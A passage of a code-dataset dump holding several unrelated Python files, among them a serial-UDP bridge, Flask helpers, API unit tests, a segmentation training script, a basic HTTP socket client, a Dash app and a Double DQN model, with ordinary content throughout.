task_status\n ) -> None:\n parts: list[bytes] = []\n bytes_read: int = 0\n\n MAX_BYTES: int = 4096\n\n async with tx:\n task_status.started()\n while True:\n data = await to_thread.run_sync(self._port.read, 1, cancellable=True)\n parts.append(data)\n bytes_read += len(data)\n\n while self._port.in_waiting > 0:\n to_read = min(self._port.in_waiting, MAX_BYTES - bytes_read)\n if to_read <= 0:\n break\n\n data = await to_thread.run_sync(\n self._port.read, to_read, cancellable=True\n )\n parts.append(data)\n bytes_read += len(data)\n\n await tx.send(b\"\".join(parts))\n\n parts.clear()\n bytes_read = 0\n\n async def _read_from_socket(\n self, listener, tx: SendChannel[bytes], *, task_status\n ) -> None:\n with closing(listener):\n async with tx:\n task_status.started()\n while True:\n data, address = await listener.recvfrom(4096)\n self._targets.add(address)\n await 
tx.send(data)\n\n async def _write_to_serial_port(self, *, task_status) -> None:\n tx, rx = open_memory_channel(32)\n\n async with rx:\n task_status.started(tx)\n async for data in rx:\n await to_thread.run_sync(self._port.write, data, cancellable=True)\n\n async def _write_to_socket(self, socket, *, task_status) -> None:\n tx, rx = open_memory_channel(32)\n\n async with rx:\n task_status.started(tx)\n async for data in rx:\n # TODO(ntamas): maybe we should write to a multicast address\n # instead?\n for address in self._targets:\n await socket.sendto(data, address)\n","repo_name":"skybrush-io/ap-swarm-launcher","sub_path":"src/ap_swarm_launcher/udp_serial_bridge.py","file_name":"udp_serial_bridge.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"20688565414","text":"from flask import g, request\nfrom morio.model import User, Repository, Course\nfrom morio.core.error import NotFoundError, SignatureError\nfrom morio.core.error import JsonException\n\n\ndef retrieve_payload(schema):\n from voluptuous import Schema\n from voluptuous import REMOVE_EXTRA\n from voluptuous import MultipleInvalid\n\n payload = request.get_json()\n if not payload:\n raise JsonException(desc='Payload missing')\n schema = Schema(schema, extra=REMOVE_EXTRA)\n try:\n payload = schema(payload)\n except MultipleInvalid as e:\n raise JsonException(desc=e.msg)\n return payload\n\n\ndef if_email(email):\n import re\n return re.compile('[^@]+@[^@]+\\.[^@]+').match(email)\n\n\ndef retrieve_user_repo(username, repo_name):\n user = User.query.filter_by(name=username).first()\n if not user:\n raise NotFoundError(desc='User not found')\n repo = Repository.query.filter_by(user_id=user.id, name=repo_name).first()\n if not repo or (\n repo.private and (not g.user or g.user.id != repo.user_id)\n ):\n raise NotFoundError(desc='Repo not found')\n return user, repo\n\n\ndef retrieve_course(course_id):\n course = Course.query.get(course_id)\n if not course:\n raise NotFoundError\n if course.user_id != g.user.id:\n raise SignatureError(description='Permission denied')\n return course\n","repo_name":"wddwycc/morio","sub_path":"morio/routes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20536556211","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\n\nfrom manuka.extensions import db\nfrom manuka import models\nfrom manuka.tests.unit import base\n\n\nCONF = cfg.CONF\n\n\nclass TestExternalIdApi(base.ApiTestCase):\n\n def setUp(self):\n super().setUp()\n user, external_id = self.make_db_user(state='created',\n email='test@example.com')\n self.user = user\n self.external_id = external_id\n\n def test_external_id_get(self):\n response = self.client.get('/api/v1/external-ids/%s/' %\n self.external_id.id)\n\n self.assert200(response)\n self.assertExternalIdEqual(self.external_id, response.get_json())\n\n def test_external_id_update(self):\n new_user, new_external_id = self.make_db_user(\n id=345, state='created', email='test2@example.com')\n\n self.assertEqual(1, len(new_user.external_ids))\n self.assertEqual(1, len(self.user.external_ids))\n data = {'user_id': new_user.keystone_user_id}\n response = self.client.patch('/api/v1/external-ids/%s/' %\n self.external_id.id,\n json=data)\n\n self.assert200(response)\n new_user = db.session.query(models.User).get(new_user.id)\n self.assertEqual(2, len(new_user.external_ids))\n old_user = db.session.query(models.User).get(self.user.id)\n self.assertEqual(0, len(old_user.external_ids))\n\n external_id = db.session.query(models.ExternalId).get(\n self.external_id.id)\n\n self.assertExternalIdEqual(external_id, response.get_json())\n\n def test_external_id_delete(self):\n response = self.client.delete('/api/v1/external-ids/%s/' %\n self.external_id.id)\n self.assertStatus(response, 204)\n","repo_name":"NeCTAR-RC/manuka","sub_path":"manuka/tests/unit/api/v1/test_external_id.py","file_name":"test_external_id.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14680832309","text":"\"\"\"\ntraining code\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nimport argparse\nimport logging\nimport os\nimport torch\n\nfrom config import cfg, assert_and_infer_cfg\nfrom utils.misc import AverageMeter, prep_experiment, evaluate_eval, fast_hist\nimport datasets\nimport loss\nimport network\nimport optimizer\nimport time\nimport torchvision.utils as vutils\nimport torch.nn.functional as F\nfrom network.mynn import freeze_weights, unfreeze_weights\nimport numpy as np\nimport random\n\n# Argument Parser\nparser = argparse.ArgumentParser(description='Semantic Segmentation')\nparser.add_argument('--lr', type=float, default=0.01)\nparser.add_argument('--arch', type=str, default='network.deepv3.DeepWV3Plus',\n help='Network architecture. 
We have DeepSRNX50V3PlusD (backbone: ResNeXt50) \\\n and deepWV3Plus (backbone: WideResNet38).')\nparser.add_argument('--dataset', nargs='*', type=str, default=['cityscapes'],\n help='a list of datasets; cityscapes, mapillary, camvid, kitti, gtav, synthia')\nparser.add_argument('--image_uniform_sampling', action='store_true', default=False,\n help='uniformly sample images across the multiple source domains')\nparser.add_argument('--val_dataset', nargs='*', type=str, default=['bdd100k'],\n help='a list consisting of cityscapes, mapillary, gtav, bdd100k, synthia')\nparser.add_argument('--covstat_val_dataset', nargs='*', type=str, default=['cityscapes'],\n help='a list consisting of cityscapes, mapillary, gtav, bdd100k, synthia')\nparser.add_argument('--cv', type=int, default=0,\n help='cross-validation split id to use. Default # of splits set to 3 in config')\nparser.add_argument('--class_uniform_pct', type=float, default=0,\n help='What fraction of images is uniformly sampled')\nparser.add_argument('--class_uniform_tile', type=int, default=1024,\n help='tile size for class uniform sampling')\nparser.add_argument('--coarse_boost_classes', type=str, default=None,\n help='use coarse annotations to boost fine data with specific classes')\n\nparser.add_argument('--img_wt_loss', action='store_true', default=False,\n help='per-image class-weighted loss')\nparser.add_argument('--cls_wt_loss', action='store_true', default=False,\n help='class-weighted loss')\nparser.add_argument('--batch_weighting', action='store_true', default=False,\n help='Batch weighting for class (use nll class weighting using batch stats)')\n\nparser.add_argument('--jointwtborder', action='store_true', default=False,\n help='Enable boundary label relaxation')\nparser.add_argument('--strict_bdr_cls', type=str, default='',\n help='Enable boundary label relaxation for specific classes')\nparser.add_argument('--rlx_off_iter', type=int, default=-1,\n help='Turn off border relaxation after specific epoch count')\nparser.add_argument('--rescale', type=float, default=1.0,\n help='Warm Restarts new learning rate ratio compared to original lr')\nparser.add_argument('--repoly', type=float, default=1.5,\n help='Warm Restart new poly exp')\n\nparser.add_argument('--fp16', action='store_true', default=False,\n help='Use Nvidia Apex AMP')\nparser.add_argument('--local_rank', default=0, type=int,\n help='parameter used by apex library')\n\nparser.add_argument('--sgd', action='store_true', default=True)\nparser.add_argument('--adam', action='store_true', default=False)\nparser.add_argument('--amsgrad', action='store_true', default=False)\n\nparser.add_argument('--freeze_trunk', action='store_true', default=False)\nparser.add_argument('--hardnm', default=0, type=int,\n help='0 means no aug, 1 means hard negative mining iter 1,' +\n '2 means hard negative mining iter 2')\n\nparser.add_argument('--trunk', type=str, default='resnet101',\n help='trunk model, can be: resnet101 (default), resnet50')\nparser.add_argument('--max_epoch', type=int, default=180)\nparser.add_argument('--max_iter', type=int, default=30000)\nparser.add_argument('--max_cu_epoch', type=int, default=100000,\n help='Class Uniform Max Epochs')\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--crop_nopad', action='store_true', default=False)\nparser.add_argument('--rrotate', type=int,\n default=0, help='degree of random rotate')\nparser.add_argument('--color_aug', type=float,\n default=0.0, help='level of color augmentation')\nparser.add_argument('--gblur', action='store_true', default=False,\n help='Use Gaussian Blur Augmentation')\nparser.add_argument('--bblur', action='store_true', default=False,\n help='Use Bilateral Blur Augmentation')\nparser.add_argument('--lr_schedule', type=str, default='poly',\n help='name of lr schedule: poly')\nparser.add_argument('--poly_exp', type=float, default=0.9,\n help='polynomial LR exponent')\nparser.add_argument('--bs_mult', type=int, default=2,\n help='Batch size for training per gpu')\nparser.add_argument('--bs_mult_val', type=int, default=1,\n help='Batch size for Validation per gpu')\nparser.add_argument('--crop_size', type=int, default=720,\n help='training crop size')\nparser.add_argument('--pre_size', type=int, default=None,\n help='resize image shorter edge to this before augmentation')\nparser.add_argument('--scale_min', type=float, default=0.5,\n help='dynamically scale training images down to this size')\nparser.add_argument('--scale_max', type=float, default=2.0,\n help='dynamically scale training images up to this size')\nparser.add_argument('--weight_decay', type=float, default=5e-4)\nparser.add_argument('--momentum', type=float, default=0.9)\nparser.add_argument('--snapshot', type=str, default=None)\nparser.add_argument('--restore_optimizer', action='store_true', default=False)\n\nparser.add_argument('--city_mode', type=str, default='train',\n help='experiment directory date name')\nparser.add_argument('--date', type=str, default='default',\n help='experiment directory date name')\nparser.add_argument('--exp', type=str, default='default',\n help='experiment directory name')\nparser.add_argument('--tb_tag', type=str, default='',\n help='add tag to tb dir')\nparser.add_argument('--ckpt', type=str, default='logs/ckpt',\n help='Save Checkpoint Point')\nparser.add_argument('--tb_path', type=str, default='logs/tb',\n help='Save Tensorboard Path')\nparser.add_argument('--syncbn', action='store_true', default=True,\n help='Use Synchronized BN')\nparser.add_argument('--dump_augmentation_images', action='store_true', default=False,\n help='Dump Augmented Images for sanity check')\nparser.add_argument('--test_mode', action='store_true', default=False,\n help='Minimum testing to verify nothing failed, ' +\n 'Runs code for 1 epoch of train and val')\nparser.add_argument('-wb', '--wt_bound', type=float, default=1.0,\n help='Weight Scaling for the losses')\nparser.add_argument('--maxSkip', type=int, default=0,\n help='Skip x number of frames of video augmented dataset')\nparser.add_argument('--scf', action='store_true', default=False,\n help='scale correction factor')\nparser.add_argument('--dist_url', default='tcp://127.0.0.1:', type=str,\n help='url used to set up distributed training')\n\nparser.add_argument('--wt_layer', nargs='*', type=int, default=[0,0,0,0,0,0,0],\n help='0: None, 1: IW/IRW, 2: ISW, 3: IS, 4: IN (IBNNet: 0 0 4 4 4 0 0)')\nparser.add_argument('--wt_reg_weight', type=float, default=0.0)\nparser.add_argument('--relax_denom', type=float, default=2.0)\nparser.add_argument('--clusters', type=int, default=50)\nparser.add_argument('--trials', type=int, default=10)\nparser.add_argument('--dynamic', action='store_true', default=False)\n\nparser.add_argument('--image_in', action='store_true', default=False,\n help='Input Image Instance Norm')\nparser.add_argument('--cov_stat_epoch', type=int, default=5,\n help='cov_stat_epoch')\nparser.add_argument('--visualize_feature', action='store_true', default=False,\n help='Visualize intermediate 
feature')\nparser.add_argument('--use_wtloss', action='store_true', default=False,\n help='Automatic setting from wt_layer')\nparser.add_argument('--use_isw', action='store_true', default=False,\n help='Automatic setting from wt_layer')\n\nargs = parser.parse_args()\n\n# Enable CUDNN Benchmarking optimization\n#torch.backends.cudnn.benchmark = True\nrandom_seed = cfg.RANDOM_SEED #304\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed) # if use multi-GPU\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(random_seed)\nrandom.seed(random_seed)\n\nargs.world_size = 1\n\n# Test Mode run two epochs with a few iterations of training and val\nif args.test_mode:\n args.max_epoch = 2\n\nif 'WORLD_SIZE' in os.environ:\n # args.apex = int(os.environ['WORLD_SIZE']) > 1\n args.world_size = int(os.environ['WORLD_SIZE'])\n print(\"Total world size: \", int(os.environ['WORLD_SIZE']))\n\ntorch.cuda.set_device(args.local_rank)\nprint('My Rank:', args.local_rank)\n# Initialize distributed communication\nargs.dist_url = args.dist_url + str(8000 + (int(time.time()%1000))//10)\n\ntorch.distributed.init_process_group(backend='nccl',\n init_method=args.dist_url,\n world_size=args.world_size,\n rank=args.local_rank)\n\nfor i in range(len(args.wt_layer)):\n if args.wt_layer[i] == 1:\n args.use_wtloss = True\n if args.wt_layer[i] == 2:\n args.use_wtloss = True\n args.use_isw = True\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n # Set up the Arguments, Tensorboard Writer, Dataloader, Loss Fn, Optimizer\n assert_and_infer_cfg(args)\n writer = prep_experiment(args, parser)\n\n train_loader, val_loaders, train_obj, extra_val_loaders, covstat_val_loaders = datasets.setup_loaders(args)\n\n criterion, criterion_val = loss.get_loss(args)\n criterion_aux = loss.get_loss_aux(args)\n net = network.get_net(args, criterion, criterion_aux)\n\n optim, scheduler = optimizer.get_optimizer(args, net)\n\n net = torch.nn.SyncBatchNorm.convert_sync_batchnorm(net)\n net = network.warp_network_in_dataparallel(net, args.local_rank)\n epoch = 0\n i = 0\n\n if args.snapshot:\n epoch, mean_iu = optimizer.load_weights(net, optim, scheduler,\n args.snapshot, args.restore_optimizer)\n if args.restore_optimizer is True:\n iter_per_epoch = len(train_loader)\n i = iter_per_epoch * epoch\n else:\n epoch = 0\n\n print(\"#### iteration\", i)\n torch.cuda.empty_cache()\n # Main Loop\n # for epoch in range(args.start_epoch, args.max_epoch):\n\n while i < args.max_iter:\n # Update EPOCH CTR\n cfg.immutable(False)\n cfg.ITER = i\n cfg.immutable(True)\n\n i = train(train_loader, net, optim, epoch, writer, scheduler, args.max_iter)\n train_loader.sampler.set_epoch(epoch + 1)\n\n if (args.dynamic and args.use_isw and epoch % (args.cov_stat_epoch + 1) == args.cov_stat_epoch) \\\n or (args.dynamic is False and args.use_isw and epoch == args.cov_stat_epoch):\n net.module.reset_mask_matrix()\n for trial in range(args.trials):\n for dataset, val_loader in covstat_val_loaders.items(): # For get the statistics of covariance\n validate_for_cov_stat(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i,\n save_pth=False)\n net.module.set_mask_matrix()\n\n if args.local_rank == 0:\n print(\"Saving pth file...\")\n evaluate_eval(args, net, optim, scheduler, None, None, [],\n writer, epoch, \"None\", None, i, save_pth=True)\n\n if args.class_uniform_pct:\n if epoch >= args.max_cu_epoch:\n train_obj.build_epoch(cut=True)\n 
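# keep the sampler's sample count in sync with the freshly rebuilt class-uniform epoch\n 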
train_loader.sampler.set_num_samples()\n else:\n train_obj.build_epoch()\n\n epoch += 1\n\n # Validation after epochs\n if len(val_loaders) == 1:\n # Run validation only one time - To save models\n for dataset, val_loader in val_loaders.items():\n validate(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i)\n else:\n if args.local_rank == 0:\n print(\"Saving pth file...\")\n evaluate_eval(args, net, optim, scheduler, None, None, [],\n writer, epoch, \"None\", None, i, save_pth=True)\n\n for dataset, val_loader in extra_val_loaders.items():\n print(\"Extra validating... This won't save pth file\")\n validate(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i, save_pth=False)\n\n\ndef train(train_loader, net, optim, curr_epoch, writer, scheduler, max_iter):\n \"\"\"\n Runs the training loop per epoch\n train_loader: Data loader for train\n net: the network\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return:\n \"\"\"\n net.train()\n\n train_total_loss = AverageMeter()\n time_meter = AverageMeter()\n\n curr_iter = curr_epoch * len(train_loader)\n\n for i, data in enumerate(train_loader):\n if curr_iter >= max_iter:\n break\n\n inputs, gts, _, aux_gts = data\n\n # Multi source and AGG case\n if len(inputs.shape) == 5:\n B, D, C, H, W = inputs.shape\n num_domains = D\n inputs = inputs.transpose(0, 1)\n gts = gts.transpose(0, 1).squeeze(2)\n aux_gts = aux_gts.transpose(0, 1).squeeze(2)\n\n inputs = [input.squeeze(0) for input in torch.chunk(inputs, num_domains, 0)]\n gts = [gt.squeeze(0) for gt in torch.chunk(gts, num_domains, 0)]\n aux_gts = [aux_gt.squeeze(0) for aux_gt in torch.chunk(aux_gts, num_domains, 0)]\n else:\n B, C, H, W = inputs.shape\n num_domains = 1\n inputs = [inputs]\n gts = [gts]\n aux_gts = [aux_gts]\n\n batch_pixel_size = C * H * W\n\n for di, ingredients in enumerate(zip(inputs, gts, aux_gts)):\n input, gt, aux_gt = ingredients\n\n start_ts = time.time()\n\n img_gt = None\n input, gt = input.cuda(), gt.cuda()\n\n optim.zero_grad()\n if args.use_isw:\n outputs = net(input, gts=gt, aux_gts=aux_gt, img_gt=img_gt, visualize=args.visualize_feature,\n apply_wtloss=False if curr_epoch<=args.cov_stat_epoch else True)\n else:\n outputs = net(input, gts=gt, aux_gts=aux_gt, img_gt=img_gt, visualize=args.visualize_feature)\n outputs_index = 0\n main_loss = outputs[outputs_index]\n outputs_index += 1\n aux_loss = outputs[outputs_index]\n outputs_index += 1\n total_loss = main_loss + (0.4 * aux_loss)\n\n if args.use_wtloss and (not args.use_isw or (args.use_isw and curr_epoch > args.cov_stat_epoch)):\n wt_loss = outputs[outputs_index]\n outputs_index += 1\n total_loss = total_loss + (args.wt_reg_weight * wt_loss)\n else:\n wt_loss = 0\n\n if args.visualize_feature:\n f_cor_arr = outputs[outputs_index]\n outputs_index += 1\n\n log_total_loss = total_loss.clone().detach_()\n torch.distributed.all_reduce(log_total_loss, torch.distributed.ReduceOp.SUM)\n log_total_loss = log_total_loss / args.world_size\n train_total_loss.update(log_total_loss.item(), batch_pixel_size)\n\n total_loss.backward()\n optim.step()\n\n time_meter.update(time.time() - start_ts)\n\n del total_loss, log_total_loss\n\n if args.local_rank == 0:\n if i % 50 == 49:\n if args.visualize_feature:\n visualize_matrix(writer, f_cor_arr, curr_iter, '/Covariance/Feature-')\n\n msg = '[epoch {}], [iter {} / {} : {}], [loss {:0.6f}], [lr {:0.6f}], [time {:0.4f}]'.format(\n curr_epoch, i + 1, len(train_loader), curr_iter, train_total_loss.avg,\n optim.param_groups[-1]['lr'], time_meter.avg / args.train_batch_size)\n\n logging.info(msg)\n if args.use_wtloss:\n print(\"Whitening Loss\", wt_loss)\n\n # Log tensorboard metrics for each iteration of the training phase\n writer.add_scalar('loss/train_loss', (train_total_loss.avg),\n curr_iter)\n train_total_loss.reset()\n time_meter.reset()\n\n curr_iter += 1\n scheduler.step()\n\n if i > 5 and args.test_mode:\n return curr_iter\n\n return curr_iter\n\ndef validate(val_loader, dataset, net, criterion, optim, scheduler, curr_epoch, writer, curr_iter, save_pth=True):\n \"\"\"\n Runs the validation loop after each training epoch\n val_loader: Data loader for validation\n dataset: dataset name (str)\n net: the network\n criterion: loss fn\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return: val_avg for step function if required\n \"\"\"\n\n net.eval()\n val_loss = AverageMeter()\n iou_acc = 0\n error_acc = 0\n dump_images = []\n\n for val_idx, data in enumerate(val_loader):\n # input = torch.Size([1, 3, 713, 713])\n # gt_image = torch.Size([1, 713, 713])\n inputs, gt_image, img_names, _ = data\n\n if len(inputs.shape) == 5:\n B, D, C, H, W = inputs.shape\n inputs = inputs.view(-1, C, H, W)\n gt_image = gt_image.view(-1, 1, H, W)\n\n assert len(inputs.size()) == 4 and len(gt_image.size()) == 3\n assert inputs.size()[2:] == gt_image.size()[1:]\n\n batch_pixel_size = inputs.size(0) * inputs.size(2) * inputs.size(3)\n inputs, gt_cuda = inputs.cuda(), gt_image.cuda()\n\n with torch.no_grad():\n if args.use_wtloss:\n output, f_cor_arr = net(inputs, visualize=True)\n else:\n output = net(inputs)\n\n del inputs\n\n assert output.size()[2:] == gt_image.size()[1:]\n assert output.size()[1] == datasets.num_classes\n\n val_loss.update(criterion(output, gt_cuda).item(), batch_pixel_size)\n\n del gt_cuda\n\n # Collect data from different GPU to a single GPU since\n # encoding.parallel.criterionparallel function calculates distributed loss\n # functions\n predictions = output.data.max(1)[1].cpu()\n\n # Logging\n if val_idx % 20 == 0:\n if args.local_rank == 0:\n logging.info(\"validating: %d / %d\", val_idx + 1, len(val_loader))\n if val_idx > 10 and args.test_mode:\n break\n\n # Image Dumps\n if val_idx < 10:\n dump_images.append([gt_image, predictions, img_names])\n\n iou_acc += fast_hist(predictions.numpy().flatten(), gt_image.numpy().flatten(),\n datasets.num_classes)\n del output, val_idx, data\n\n iou_acc_tensor = torch.cuda.FloatTensor(iou_acc)\n torch.distributed.all_reduce(iou_acc_tensor, op=torch.distributed.ReduceOp.SUM)\n iou_acc = iou_acc_tensor.cpu().numpy()\n\n if args.local_rank == 0:\n evaluate_eval(args, net, optim, scheduler, val_loss, iou_acc, dump_images,\n writer, curr_epoch, dataset, None, curr_iter, save_pth=save_pth)\n\n if args.use_wtloss:\n visualize_matrix(writer, f_cor_arr, curr_iter, '/Covariance/Feature-')\n\n return val_loss.avg\n\ndef validate_for_cov_stat(val_loader, dataset, net, criterion, optim, scheduler, curr_epoch, writer, curr_iter, save_pth=True):\n \"\"\"\n Runs the validation loop after each training epoch\n val_loader: Data loader for validation\n dataset: dataset name (str)\n net: the network\n criterion: loss fn\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return: val_avg for step function if required\n \"\"\"\n\n # net.train()#eval()\n net.eval()\n\n for val_idx, data in enumerate(val_loader):\n img_or, img_photometric, img_geometric, img_name = data # img_geometric is not used.\n 
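# move both views to the GPU; the forward pass below only accumulates covariance statistics (cal_covstat=True)\n 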
img_or, img_photometric = img_or.cuda(), img_photometric.cuda()\n\n with torch.no_grad():\n net([img_photometric, img_or], cal_covstat=True)\n\n del img_or, img_photometric, img_geometric\n\n # Logging\n if val_idx % 20 == 0:\n if args.local_rank == 0:\n logging.info(\"validating: %d / 100\", val_idx + 1)\n del data\n\n if val_idx >= 499:\n return\n\n\ndef visualize_matrix(writer, matrix_arr, iteration, title_str):\n stage = 'valid'\n\n for i in range(len(matrix_arr)):\n C = matrix_arr[i].shape[1]\n matrix = matrix_arr[i][0].unsqueeze(0) # 1 X C X C\n matrix = torch.clamp(torch.abs(matrix), max=1)\n matrix = torch.cat((torch.ones(1, C, C).cuda(), torch.abs(matrix - 1.0),\n torch.abs(matrix - 1.0)), 0)\n matrix = vutils.make_grid(matrix, padding=5, normalize=False, range=(0,1))\n writer.add_image(stage + title_str + str(i), matrix, iteration)\n\n\ndef save_feature_numpy(feature_maps, iteration):\n file_fullpath = '/home/userA/projects/visualization/feature_map/'\n file_name = str(args.date) + '_' + str(args.exp)\n B, C, H, W = feature_maps.shape\n for i in range(B):\n feature_map = feature_maps[i]\n feature_map = feature_map.data.cpu().numpy() # H X D\n file_name_post = '_' + str(iteration * B + i)\n np.save(file_fullpath + file_name + file_name_post, feature_map)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shachoi/RobustNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":22722,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"52"} +{"seq_id":"27997499679","text":"import socket\nfrom termcolor import colored,cprint\n\nwelcome_msg = colored('Welcome to my first Black Hat Python Project','red',attrs=['reverse','blink'])\nprint(welcome_msg)\nprint('Format {hostname}:{port}')\ntarget = input('Enter the target: ').split(':')\ntarget_host = target[0]\ntarget_port = int(target[1])\n\n#create socket object\nclient = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n#connect to client\nclient.connect((target_host,target_port))\n\nrequest = 'GET / HTTP/1.1\\nHost: {}\\n\\n'.format(target_host).encode('utf-8')\n#send some data\nclient.send(request)\n\n#recieve some data\nresponse = client.recv(1024)\n\ncprint(response,'green')\n\n\n\n\n\n","repo_name":"ab41j1t4000/hacking_scripts","sub_path":"Black-Hat-Python-Projects/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11380519642","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport dash\r\nimport json\r\nimport layout as lo\r\nimport utils\r\nimport styles as st\r\nfrom dash.dependencies import Input\r\nfrom dash.dependencies import Output\r\nfrom dash.dependencies import State\r\n\r\n# import pandas as pd\r\n# from datetime import datetime\r\n# import A_star\r\n# import pickle\r\n# import the css template, and pass the css template into dash\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp.title = \"Boston Pathfinding Visualization\"\r\napp.layout = lo.layout\r\nstyles = st.styles\r\n\r\n\r\n# ##################################callback for left side components\r\n# @app.callback(\r\n# dash.dependencies.Output('my-graph', 'figure'),\r\n# [dash.dependencies.Input('my-range-slider', 'value'), dash.dependencies.Input('input1', 'value')])\r\n# def update_output(value, input1):\r\n# YEAR = value\r\n# 
ACCOUNT = input1\r\n# return draw_graph(value, input1)\r\n# # to update the global variable of YEAR and ACCOUNT\r\n#\r\n\r\n\r\n@app.callback(\r\n Output('my-graph', 'figure'),\r\n Output('confirm', 'displayed'),\r\n Input('play-val', 'n_clicks'),\r\n Input('show-dest', 'children'),\r\n Input('reset', 'n_clicks'),\r\n Input('my-graph', 'clickData'),\r\n State('add-block', 'style'))\r\ndef update_output(n_clicks, new_dest, reset, clickData, style):\r\n ctx = dash.callback_context\r\n if not ctx.triggered:\r\n button_id = 'No clicks yet'\r\n else:\r\n button_id = ctx.triggered[0]['prop_id']\r\n if button_id == 'my-graph.clickData' and style == styles['add-block-enable']:\r\n # add block\r\n return utils.add_block(clickData), False\r\n elif button_id == 'play-val.n_clicks' or button_id == 'reset.n_clicks' or button_id == 'show-dest.children':\r\n # next tic\r\n return utils.next_tic(n_clicks, reset), utils.global_restart_flag\r\n\r\n else:\r\n # no update\r\n return dash.no_update, False\r\n\r\n\r\n\r\n# ###############################callback for right side components\r\n# @app.callback(\r\n# Output('hover-data', 'children'),\r\n# Input('my-graph', 'hoverData'))\r\n# def display_hover_data(hoverData):\r\n# return json.dumps(hoverData, indent=2)\r\n#\r\n\r\n@app.callback(\r\n Output('click-data', 'children'),\r\n Input('my-graph', 'clickData'))\r\ndef display_click_data(clickData):\r\n return json.dumps(clickData, indent=2)\r\n\r\n\r\n@app.callback(\r\n Output('show-dest', 'children'),\r\n Input('set-dest', 'n_clicks'),\r\n State('click-data', 'children'))\r\ndef set_destination(n_clicks, new_dest):\r\n return utils.update_destination(new_dest)\r\n\r\n\r\n@app.callback(\r\n Output('add-block', 'style'),\r\n Input('add-block', 'n_clicks'))\r\ndef enable_add_block(n_clicks):\r\n return styles[utils.enable_add_block(n_clicks)]\r\n\r\n\r\n@app.callback(\r\n Output('show-algorithm', 'children'),\r\n Input('switch-algorithm', 'n_clicks'),\r\n Input('step-slider', 'value'))\r\ndef game_settings(n_clicks, value):\r\n ctx = dash.callback_context\r\n if not ctx.triggered:\r\n button_id = 'switch-algorithm.n_clicks'\r\n else:\r\n button_id = ctx.triggered[0]['prop_id']\r\n\r\n if button_id == 'switch-algorithm.n_clicks':\r\n return utils.switch_algorithm()\r\n elif button_id == 'step-slider.value':\r\n return utils.change_npc_step(value)\r\n else:\r\n return dash.no_update\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","repo_name":"route-recommendation-web/BOS-VIZ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18828236651","text":"import gym\nfrom utils.preprocess import greyscale\nfrom utils.wrappers import PreproWrapper, MaxAndSkipEnv\n\nimport tensorflow as tf\n\nfrom q2_schedule import LinearExploration, LinearSchedule\nfrom q4_nature_torch import NatureQN\nfrom configs.q6_train_atari_doubledqn import config\n\n\nclass DoubleDQN(NatureQN):\n \"\"\"\n Implementation for Double DQN\n \"\"\"\n def add_loss_op(self, q, target_q):\n num_actions = self.env.action_space.n\n y_val = self.r + self.config.gamma * tf.reduce_sum(tf.multiply(target_q, tf.one_hot(tf.arg_max(q, dimension=1), num_actions)), axis=1)\n q_sample = tf.where(self.done_mask, self.r, y_val)\n q_new = tf.reduce_sum(tf.multiply(tf.one_hot(self.a, num_actions), q), axis=1)\n self.loss = tf.reduce_mean(tf.square(q_new - q_sample))\n\n\nif __name__ == '__main__':\n # make 
env\n env = gym.make(config.env_name)\n env = MaxAndSkipEnv(env, skip=config.skip_frame)\n env = PreproWrapper(env, prepro=greyscale, shape=(80, 80, 1),\n overwrite_render=config.overwrite_render)\n\n # exploration strategy\n exp_schedule = LinearExploration(env, config.eps_begin,\n config.eps_end, config.eps_nsteps)\n\n # learning rate schedule\n lr_schedule = LinearSchedule(config.lr_begin, config.lr_end,\n config.lr_nsteps)\n\n # train model\n model = DoubleDQN(env, config)\n model.run(exp_schedule, lr_schedule)","repo_name":"tejas1794/RL-Project","sub_path":"src/q6_train_atari_doubledqn.py","file_name":"q6_train_atari_doubledqn.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36852474051","text":"#!/usr/bin/env python\n\n# convert libsvm file compressing indices\n\n# python svm2svm.py file.libsvm > newfile.libsvm\nfrom __future__ import print_function\nimport string, os, sys\n\n\ndef svm2svm(lines):\n gf 